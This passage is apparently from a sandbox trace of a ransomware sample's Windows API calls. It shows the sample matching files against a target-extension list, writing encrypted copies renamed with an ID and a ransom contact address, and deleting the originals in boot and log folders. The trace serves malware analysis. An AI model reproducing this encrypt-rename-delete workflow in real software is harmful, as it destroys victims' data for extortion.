(lpFileName="C:\\Boot\\bootvhd.dll" (normalized: "c:\\boot\\bootvhd.dll")) returned 0x20 [0059.511] GetFileAttributesW (lpFileName="C:\\Boot\\bootvhd.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\boot\\bootvhd.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0059.511] CreateFileW (lpFileName="C:\\Boot\\bootvhd.dll" (normalized: "c:\\boot\\bootvhd.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0059.511] lstrlenW (lpString="C:\\Boot\\bootvhd.dll") returned 19 [0059.511] lstrlenW (lpString="C:\\Boot\\bootvhd.dll") returned 19 [0059.511] lstrlenW (lpString=".doc") returned 4 [0059.511] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0059.511] lstrlenW (lpString=".docx") returned 5 [0059.511] lstrcmpiW (lpString1=".docx", lpString2="d.dll") returned -1 [0059.511] lstrlenW (lpString=".pdf") returned 4 [0059.511] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0059.511] lstrlenW (lpString=".xls") returned 4 [0059.511] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0059.511] lstrlenW (lpString=".xlsx") returned 5 [0059.511] lstrcmpiW (lpString1=".xlsx", lpString2="d.dll") returned -1 [0059.511] lstrlenW (lpString=".ppt") returned 4 [0059.511] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0059.511] lstrlenW (lpString="C:\\Boot\\bootvhd.dll") returned 19 [0059.511] lstrlenW (lpString=".zip") returned 4 [0059.511] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0059.512] lstrlenW (lpString=".rar") returned 4 [0059.512] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0059.512] lstrlenW (lpString=".bz2") returned 4 [0059.512] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0059.512] lstrlenW (lpString=".7z") returned 3 [0059.512] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0059.512] lstrlenW (lpString="C:\\Boot\\bootvhd.dll") returned 19 [0059.512] lstrlenW (lpString=".dbf") returned 4 [0059.512] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0059.518] MoveFileW (lpExistingFileName="C:\\Boot\\Fonts\\chs_boot.ttf" (normalized: "c:\\boot\\fonts\\chs_boot.ttf"), lpNewFileName="C:\\Boot\\Fonts\\chs_boot.ttf.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\boot\\fonts\\chs_boot.ttf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0059.520] MoveFileW (lpExistingFileName="C:\\Boot\\Fonts\\cht_boot.ttf" (normalized: "c:\\boot\\fonts\\cht_boot.ttf"), lpNewFileName="C:\\Boot\\Fonts\\cht_boot.ttf.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\boot\\fonts\\cht_boot.ttf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0059.522] MoveFileW (lpExistingFileName="C:\\Boot\\Fonts\\jpn_boot.ttf" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf"), lpNewFileName="C:\\Boot\\Fonts\\jpn_boot.ttf.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0059.523] MoveFileW (lpExistingFileName="C:\\Boot\\Fonts\\kor_boot.ttf" (normalized: "c:\\boot\\fonts\\kor_boot.ttf"), lpNewFileName="C:\\Boot\\Fonts\\kor_boot.ttf.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\boot\\fonts\\kor_boot.ttf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0060.228] SetFileAttributesW (lpFileName="C:\\bootmgr", dwFileAttributes=0x26) returned 0 [0060.228] CreateFileW (lpFileName="C:\\bootmgr" (normalized: "c:\\bootmgr"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0060.230] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0060.230] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0060.230] CreateFileW (lpFileName="C:\\BOOTNXT.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\bootnxt.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0060.230] GetLastError () returned 0x0 [0060.230] ReadFile (in: hFile=0x370, lpBuffer=0x3cf9020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2f8fecc, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesRead=0x2f8fecc*=0x1, lpOverlapped=0x0) returned 1 [0060.231] WriteFile (in: hFile=0x324, lpBuffer=0x3cf9020*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2f8fc94, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesWritten=0x2f8fc94*=0x10, lpOverlapped=0x0) returned 1 [0060.232] ReadFile (in: hFile=0x370, lpBuffer=0x3cf9020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2f8fecc, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesRead=0x2f8fecc*=0x0, lpOverlapped=0x0) returned 1 [0060.232] WriteFile (in: hFile=0x324, lpBuffer=0x3cf9020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x2f8fc94, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesWritten=0x2f8fc94*=0xe2, lpOverlapped=0x0) returned 1 [0060.232] SetEndOfFile (hFile=0x324) returned 1 [0060.233] CloseHandle (hObject=0x324) returned 1 [0060.233] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0060.233] SetEndOfFile (hFile=0x370) returned 1 [0060.234] CloseHandle (hObject=0x370) returned 1 [0060.234] SetFileAttributesW (lpFileName="C:\\BOOTNXT.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x26) returned 1 [0060.235] DeleteFileW (lpFileName="C:\\BOOTNXT" (normalized: "c:\\bootnxt")) returned 1 [0060.235] lstrlenW (lpString="C:\\BOOTNXT") returned 10 [0060.235] lstrlenW (lpString="C:\\BOOTNXT") returned 10 [0060.235] lstrlenW (lpString=".doc") returned 4 [0060.235] lstrcmpiW (lpString1=".doc", lpString2="TNXT") returned -1 [0060.235] lstrlenW (lpString=".docx") returned 5 [0060.235] lstrcmpiW (lpString1=".docx", lpString2="OTNXT") returned -1 [0060.235] lstrlenW (lpString=".pdf") returned 4 [0060.235] lstrcmpiW (lpString1=".pdf", lpString2="TNXT") returned -1 [0060.235] lstrlenW (lpString=".xls") returned 4 [0060.235] lstrcmpiW (lpString1=".xls", lpString2="TNXT") returned -1 [0060.235] lstrlenW (lpString=".xlsx") returned 5 [0060.235] lstrcmpiW (lpString1=".xlsx", lpString2="OTNXT") returned -1 [0060.235] lstrlenW (lpString=".ppt") returned 4 [0060.235] lstrcmpiW (lpString1=".ppt", lpString2="TNXT") returned -1 [0060.235] lstrlenW (lpString="C:\\BOOTNXT") returned 10 [0060.235] lstrlenW (lpString=".zip") returned 4 [0060.235] lstrcmpiW (lpString1=".zip", lpString2="TNXT") returned -1 [0060.236] lstrlenW (lpString=".rar") returned 4 [0060.236] lstrcmpiW (lpString1=".rar", lpString2="TNXT") returned -1 [0060.236] lstrlenW (lpString=".bz2") returned 4 [0060.236] lstrcmpiW (lpString1=".bz2", lpString2="TNXT") returned -1 [0060.236] lstrlenW (lpString=".7z") returned 3 [0060.236] lstrcmpiW (lpString1=".7z", lpString2="NXT") returned -1 [0060.236] lstrlenW (lpString="C:\\BOOTNXT") returned 10 [0060.236] lstrlenW (lpString=".dbf") returned 4 [0060.236] lstrcmpiW (lpString1=".dbf", lpString2="TNXT") returned -1 [0060.236] lstrlenW (lpString="C:\\BOOTNXT") returned 10 [0060.236] lstrlenW (lpString=".1cd") returned 4 [0060.236] lstrcmpiW (lpString1=".1cd", lpString2="TNXT") returned -1 [0060.236] lstrlenW (lpString="C:\\BOOTNXT") returned 10 [0060.236] lstrlenW (lpString=".jpg") returned 4 [0060.236] lstrcmpiW (lpString1=".jpg", lpString2="TNXT") returned -1 [0060.236] lstrlenW (lpString="C:\\BOOTNXT") returned 10 [0060.236] lstrlenW (lpString="C:\\BOOTNXT") returned 10 [0060.236] lstrlenW (lpString=".doc") returned 4 [0060.236] lstrcmpiW (lpString1=".doc", lpString2="TNXT") returned -1 [0060.236] lstrlenW (lpString=".docx") returned 5 [0060.236] lstrcmpiW (lpString1=".docx", lpString2="OTNXT") returned -1 [0060.236] lstrlenW (lpString=".pdf") returned 4 [0060.236] lstrcmpiW (lpString1=".pdf", lpString2="TNXT") returned -1 [0060.236] lstrlenW (lpString=".xls") returned 4 [0060.236] lstrcmpiW (lpString1=".xls", lpString2="TNXT") returned -1 [0060.236] lstrlenW (lpString=".xlsx") returned 5 [0060.236] lstrcmpiW (lpString1=".xlsx", lpString2="OTNXT") returned -1 [0060.236] lstrlenW (lpString=".ppt") returned 4 [0060.237] lstrcmpiW (lpString1=".ppt", lpString2="TNXT") returned -1 [0060.237] lstrlenW (lpString="C:\\BOOTNXT") returned 10 [0060.237] lstrlenW (lpString=".zip") returned 4 [0060.237] lstrcmpiW (lpString1=".zip", lpString2="TNXT") returned -1 [0060.237] lstrlenW (lpString=".rar") returned 4 [0060.237] lstrcmpiW (lpString1=".rar", lpString2="TNXT") returned -1 [0060.237] lstrlenW (lpString=".bz2") returned 4 [0060.237] lstrcmpiW (lpString1=".bz2", lpString2="TNXT") returned -1 [0060.237] lstrlenW (lpString=".7z") returned 3 [0060.237] lstrcmpiW (lpString1=".7z", lpString2="NXT") returned -1 [0060.237] lstrlenW (lpString="C:\\BOOTNXT") returned 10 [0060.237] lstrlenW (lpString=".dbf") returned 4 [0060.237] lstrcmpiW (lpString1=".dbf", lpString2="TNXT") returned -1 [0060.237] lstrlenW (lpString="C:\\BOOTNXT") returned 10 [0060.237] lstrlenW (lpString=".1cd") returned 4 [0060.237] lstrcmpiW (lpString1=".1cd", lpString2="TNXT") returned -1 [0060.237] lstrlenW (lpString="C:\\BOOTNXT") returned 10 [0060.237] lstrlenW (lpString=".jpg") returned 4 [0060.237] lstrcmpiW (lpString1=".jpg", lpString2="TNXT") returned -1 [0060.237] lstrcmpiW (lpString1=".sys", lpString2=".bat") returned 1 [0060.237] lstrlenW (lpString="hiberfil.sys") returned 12 [0060.237] CreateFileW (lpFileName="C:\\hiberfil.sys" (normalized: "c:\\hiberfil.sys"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0060.238] lstrlenW (lpString="C:\\hiberfil.sys") returned 15 [0060.238] lstrlenW (lpString="C:\\hiberfil.sys") returned 15 [0060.238] lstrlenW (lpString=".doc") returned 4 [0060.238] lstrcmpiW (lpString1=".doc", lpString2=".sys") returned -1 [0060.238] lstrlenW (lpString=".docx") returned 5 [0060.238] lstrcmpiW (lpString1=".docx", lpString2="l.sys") returned -1 [0060.238] lstrlenW (lpString=".pdf") returned 4 [0060.238] lstrcmpiW (lpString1=".pdf", lpString2=".sys") returned -1 [0060.238] lstrlenW (lpString=".xls") returned 4 [0060.238] lstrcmpiW (lpString1=".xls", lpString2=".sys") returned 1 [0060.238] lstrlenW (lpString=".xlsx") returned 5 [0060.238] lstrcmpiW (lpString1=".xlsx", lpString2="l.sys") returned -1 [0060.238] lstrlenW (lpString=".ppt") returned 4 [0060.238] lstrcmpiW (lpString1=".ppt", lpString2=".sys") returned -1 [0060.238] lstrlenW (lpString="C:\\hiberfil.sys") returned 15 [0060.238] lstrlenW (lpString=".zip") returned 4 [0060.238] lstrcmpiW (lpString1=".zip", lpString2=".sys") returned 1 [0060.238] lstrlenW (lpString=".rar") returned 4 [0060.238] lstrcmpiW (lpString1=".rar", lpString2=".sys") returned -1 [0060.238] lstrlenW (lpString=".bz2") returned 4 [0060.238] lstrcmpiW (lpString1=".bz2", lpString2=".sys") returned -1 [0060.238] lstrlenW (lpString=".7z") returned 3 [0060.238] lstrcmpiW (lpString1=".7z", lpString2="sys") returned -1 [0060.238] lstrlenW (lpString="C:\\hiberfil.sys") returned 15 [0060.238] lstrlenW (lpString=".dbf") returned 4 [0060.238] lstrcmpiW (lpString1=".dbf", lpString2=".sys") returned -1 [0060.238] lstrlenW (lpString="C:\\hiberfil.sys") returned 15 [0060.238] lstrlenW (lpString=".1cd") returned 4 [0060.238] lstrcmpiW (lpString1=".1cd", lpString2=".sys") returned -1 [0060.238] lstrlenW (lpString="C:\\hiberfil.sys") returned 15 [0060.239] lstrlenW (lpString=".jpg") returned 4 [0060.239] lstrcmpiW (lpString1=".jpg", lpString2=".sys") returned -1 [0060.239] lstrlenW (lpString="C:\\hiberfil.sys") returned 15 [0060.239] lstrlenW (lpString="C:\\hiberfil.sys") returned 15 [0060.239] lstrlenW (lpString=".doc") returned 4 [0060.239] lstrcmpiW (lpString1=".doc", lpString2=".sys") returned -1 [0060.239] lstrlenW (lpString=".docx") returned 5 [0060.239] lstrcmpiW (lpString1=".docx", lpString2="l.sys") returned -1 [0060.239] lstrlenW (lpString=".pdf") returned 4 [0060.239] lstrcmpiW (lpString1=".pdf", lpString2=".sys") returned -1 [0060.239] lstrlenW (lpString=".xls") returned 4 [0060.239] lstrcmpiW (lpString1=".xls", lpString2=".sys") returned 1 [0060.239] lstrlenW (lpString=".xlsx") returned 5 [0060.239] lstrcmpiW (lpString1=".xlsx", lpString2="l.sys") returned -1 [0060.239] lstrlenW (lpString=".ppt") returned 4 [0060.239] lstrcmpiW (lpString1=".ppt", lpString2=".sys") returned -1 [0060.239] lstrlenW (lpString="C:\\hiberfil.sys") returned 15 [0060.240] lstrlenW (lpString=".zip") returned 4 [0060.240] lstrcmpiW (lpString1=".zip", lpString2=".sys") returned 1 [0060.240] lstrlenW (lpString=".rar") returned 4 [0060.240] lstrcmpiW (lpString1=".rar", lpString2=".sys") returned -1 [0060.240] lstrlenW (lpString=".bz2") returned 4 [0060.240] lstrcmpiW (lpString1=".bz2", lpString2=".sys") returned -1 [0060.240] lstrlenW (lpString=".7z") returned 3 [0060.240] lstrcmpiW (lpString1=".7z", lpString2="sys") returned -1 [0060.240] lstrlenW (lpString="C:\\hiberfil.sys") returned 15 [0060.240] lstrlenW (lpString=".dbf") returned 4 [0060.240] lstrcmpiW (lpString1=".dbf", lpString2=".sys") returned -1 [0060.240] lstrlenW (lpString="C:\\hiberfil.sys") returned 15 [0060.240] lstrlenW (lpString=".1cd") returned 4 [0060.240] lstrcmpiW (lpString1=".1cd", lpString2=".sys") returned -1 [0060.240] lstrlenW (lpString="C:\\hiberfil.sys") returned 15 [0060.240] lstrlenW (lpString=".jpg") returned 4 [0060.240] lstrcmpiW (lpString1=".jpg", lpString2=".sys") returned -1 [0060.240] lstrcmpiW (lpString1=".evtx", lpString2=".bat") returned 1 [0060.240] lstrlenW (lpString="Application.evtx") returned 16 [0060.240] CreateFileW (lpFileName="C:\\Logs\\Application.evtx" (normalized: "c:\\logs\\application.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0060.286] GetFileSizeEx (in: hFile=0x370, lpFileSize=0x2f8ff14 | out: lpFileSize=0x2f8ff14*=69632) returned 1 [0060.287] CloseHandle (hObject=0x370) returned 1 [0060.287] GetFileAttributesW (lpFileName="C:\\Logs\\Application.evtx" (normalized: "c:\\logs\\application.evtx")) returned 0x20 [0060.287] GetFileAttributesW (lpFileName="C:\\Logs\\Application.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\application.evtx.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0060.287] CreateFileW (lpFileName="C:\\Logs\\Application.evtx" (normalized: "c:\\logs\\application.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0060.287] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0060.287] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0060.287] CreateFileW (lpFileName="C:\\Logs\\Application.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\application.evtx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0060.287] GetLastError () returned 0x0 [0060.287] ReadFile (in: hFile=0x370, lpBuffer=0x3cf9020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2f8fecc, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesRead=0x2f8fecc*=0x11000, lpOverlapped=0x0) returned 1 [0060.365] WriteFile (in: hFile=0x324, lpBuffer=0x3cf9020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x2f8fc94, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesWritten=0x2f8fc94*=0x11010, lpOverlapped=0x0) returned 1 [0060.367] ReadFile (in: hFile=0x370, lpBuffer=0x3cf9020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2f8fecc, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesRead=0x2f8fecc*=0x0, lpOverlapped=0x0) returned 1 [0060.367] WriteFile (in: hFile=0x324, lpBuffer=0x3cf9020*, nNumberOfBytesToWrite=0xf4, lpNumberOfBytesWritten=0x2f8fc94, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesWritten=0x2f8fc94*=0xf4, lpOverlapped=0x0) returned 1 [0060.368] SetEndOfFile (hFile=0x324) returned 1 [0060.368] CloseHandle (hObject=0x324) returned 1 [0060.370] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0060.370] SetEndOfFile (hFile=0x370) returned 1 [0060.371] CloseHandle (hObject=0x370) returned 1 [0060.371] SetFileAttributesW (lpFileName="C:\\Logs\\Application.evtx.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0060.371] DeleteFileW (lpFileName="C:\\Logs\\Application.evtx" (normalized: "c:\\logs\\application.evtx")) returned 1 [0060.371] lstrlenW (lpString="C:\\Logs\\Application.evtx") returned 24 [0060.371] lstrlenW (lpString="C:\\Logs\\Application.evtx") returned 24 [0060.371] lstrlenW (lpString=".doc") returned 4 [0060.371] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0060.371] lstrlenW (lpString=".docx") returned 5 [0060.371] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0060.371] lstrlenW (lpString=".pdf") returned 4 [0060.372] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0060.372] lstrlenW (lpString=".xls") returned 4 [0060.372] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0060.372] lstrlenW (lpString=".xlsx") returned 5 [0060.372] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0060.372] lstrlenW (lpString=".ppt") returned 4 [0060.372] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0060.372] lstrlenW (lpString="C:\\Logs\\Application.evtx") returned 24 [0060.372] lstrlenW (lpString=".zip") returned 4 [0060.372] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0060.372] lstrlenW (lpString=".rar") returned 4 [0060.372] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0060.372] lstrlenW (lpString=".bz2") returned 4 [0060.372] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0060.372] lstrlenW (lpString=".7z") returned 3 [0060.372] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0060.372] lstrlenW (lpString="C:\\Logs\\Application.evtx") returned 24 [0060.372] lstrlenW (lpString=".dbf") returned 4 [0060.372] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0060.372] lstrlenW (lpString="C:\\Logs\\Application.evtx") returned 24 [0060.372] lstrlenW (lpString=".1cd") returned 4 [0060.372] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0060.372] lstrlenW (lpString="C:\\Logs\\Application.evtx") returned 24 [0060.372] lstrlenW (lpString=".jpg") returned 4 [0060.372] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0060.372] lstrlenW (lpString="C:\\Logs\\Application.evtx") returned 24 [0060.372] lstrlenW (lpString="C:\\Logs\\Application.evtx") returned 24 [0060.372] lstrlenW (lpString=".doc") returned 4 [0060.373] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0060.373] lstrlenW (lpString=".docx") returned 5 [0060.373] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0060.373] lstrlenW (lpString=".pdf") returned 4 [0060.373] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0060.373] lstrlenW (lpString=".xls") returned 4 [0060.373] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0060.373] lstrlenW (lpString=".xlsx") returned 5 [0060.373] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0060.373] lstrlenW (lpString=".ppt") returned 4 [0060.373] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0060.373] lstrlenW (lpString="C:\\Logs\\Application.evtx") returned 24 [0060.373] lstrlenW (lpString=".zip") returned 4 [0060.373] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0060.373] lstrlenW (lpString=".rar") returned 4 [0060.373] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0060.373] lstrlenW (lpString=".bz2") returned 4 [0060.373] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0060.373] lstrlenW (lpString=".7z") returned 3 [0060.373] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0060.373] lstrlenW (lpString="C:\\Logs\\Application.evtx") returned 24 [0060.373] lstrlenW (lpString=".dbf") returned 4 [0060.373] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0060.373] lstrlenW (lpString="C:\\Logs\\Application.evtx") returned 24 [0060.373] lstrlenW (lpString=".1cd") returned 4 [0060.373] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0060.373] lstrlenW (lpString="C:\\Logs\\Application.evtx") returned 24 [0060.373] lstrlenW (lpString=".jpg") returned 4 [0060.373] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0060.374] lstrcmpiW (lpString1=".evtx", lpString2=".bat") returned 1 [0060.374] lstrlenW (lpString="HardwareEvents.evtx") returned 19 [0060.374] CreateFileW (lpFileName="C:\\Logs\\HardwareEvents.evtx" (normalized: "c:\\logs\\hardwareevents.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0061.305] GetFileSizeEx (in: hFile=0x384, lpFileSize=0x2f8ff14 | out: lpFileSize=0x2f8ff14*=69632) returned 1 [0061.305] CloseHandle (hObject=0x384) returned 1 [0061.305] GetFileAttributesW (lpFileName="C:\\Logs\\HardwareEvents.evtx" (normalized: "c:\\logs\\hardwareevents.evtx")) returned 0x20 [0061.305] GetFileAttributesW (lpFileName="C:\\Logs\\HardwareEvents.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\hardwareevents.evtx.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0061.305] CreateFileW (lpFileName="C:\\Logs\\HardwareEvents.evtx" (normalized: "c:\\logs\\hardwareevents.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0061.305] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0061.305] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0061.306] CreateFileW (lpFileName="C:\\Logs\\HardwareEvents.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\hardwareevents.evtx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0061.306] GetLastError () returned 0x0 [0061.306] ReadFile (in: hFile=0x384, lpBuffer=0x3cf9020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2f8fecc, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesRead=0x2f8fecc*=0x11000, lpOverlapped=0x0) returned 1 [0061.308] WriteFile (in: hFile=0x388, lpBuffer=0x3cf9020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x2f8fc94, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesWritten=0x2f8fc94*=0x11010, lpOverlapped=0x0) returned 1 [0061.309] ReadFile (in: hFile=0x384, lpBuffer=0x3cf9020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2f8fecc, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesRead=0x2f8fecc*=0x0, lpOverlapped=0x0) returned 1 [0061.309] WriteFile (in: hFile=0x388, lpBuffer=0x3cf9020*, nNumberOfBytesToWrite=0xfa, lpNumberOfBytesWritten=0x2f8fc94, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesWritten=0x2f8fc94*=0xfa, lpOverlapped=0x0) returned 1 [0061.309] SetEndOfFile (hFile=0x388) returned 1 [0061.309] CloseHandle (hObject=0x388) returned 1 [0061.311] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0061.311] SetEndOfFile (hFile=0x384) returned 1 [0061.312] CloseHandle (hObject=0x384) returned 1 [0061.312] SetFileAttributesW (lpFileName="C:\\Logs\\HardwareEvents.evtx.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0061.312] DeleteFileW (lpFileName="C:\\Logs\\HardwareEvents.evtx" (normalized: "c:\\logs\\hardwareevents.evtx")) returned 1 [0061.313] lstrlenW (lpString="C:\\Logs\\HardwareEvents.evtx") returned 27 [0061.313] lstrlenW (lpString="C:\\Logs\\HardwareEvents.evtx") returned 27 [0061.313] lstrlenW (lpString=".doc") returned 4 [0061.313] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0061.313] lstrlenW (lpString=".docx") returned 5 [0061.313] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0061.313] lstrlenW (lpString=".pdf") returned 4 [0061.313] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0061.313] lstrlenW (lpString=".xls") returned 4 [0061.313] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0061.313] lstrlenW (lpString=".xlsx") returned 5 [0061.313] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0061.313] lstrlenW (lpString=".ppt") returned 4 [0061.313] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0061.313] lstrlenW (lpString="C:\\Logs\\HardwareEvents.evtx") returned 27 [0061.313] lstrlenW (lpString=".zip") returned 4 [0061.313] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0061.313] lstrlenW (lpString=".rar") returned 4 [0061.313] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0061.313] lstrlenW (lpString=".bz2") returned 4 [0061.313] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0061.313] lstrlenW (lpString=".7z") returned 3 [0061.313] 